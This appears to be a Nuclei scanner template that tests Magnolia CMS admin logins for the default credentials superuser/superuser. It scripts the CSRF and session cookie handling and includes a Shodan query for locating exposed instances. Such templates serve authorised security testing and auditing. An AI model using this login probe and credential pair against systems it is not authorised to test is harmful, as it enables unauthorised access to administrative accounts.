nuclei-templates/http/default-logins/magnolia-default-login.yaml

76 lines
1.6 KiB
YAML
Raw Normal View History

2023-03-15 12:54:11 +00:00
id: magnolia-default-login
info:
name: Magnolia Default Login
author: pussycat0x
severity: high
description: Mangnolia CMS default credentials were discovered.
reference:
- https://www.magnolia-cms.com/
metadata:
verified: "true"
shodan-query: html:"Magnolia is a registered trademark"
2023-03-15 12:54:11 +00:00
tags: magnolia,default-login
http:
2023-03-15 12:54:11 +00:00
- raw:
- |
GET /.magnolia/admincentral HTTP/1.1
Host: {{Hostname}}
- |
POST /.magnolia/admincentral HTTP/1.1
Host: {{Hostname}}
Cookie: csrf={{csrf}};JSESSIONID={{session}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Referer: {{BaseURL}}/.magnolia/admincentral
mgnlUserId={{username}}&mgnlUserPSWD={{password}}&csrf={{csrf}}
- |
GET /.magnolia/admincentral/PUSH?v-uiId=1 HTTP/1.1
Host: {{Hostname}}
Cookie: csrf={{csrf}}; JSESSIONID={{session}}
payloads:
username:
- superuser
password:
- superuser
attack: pitchfork
extractors:
- type: kval
name: csrf
part: header
internal: true
kval:
- csrf
- type: kval
name: session
internal: true
part: header
kval:
- JSESSIONID
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- '"changes":'
- '"resources":'
condition: and
- type: word
part: header_3
words:
- 'application/json'
2023-03-15 12:54:11 +00:00
- type: status
status:
- 200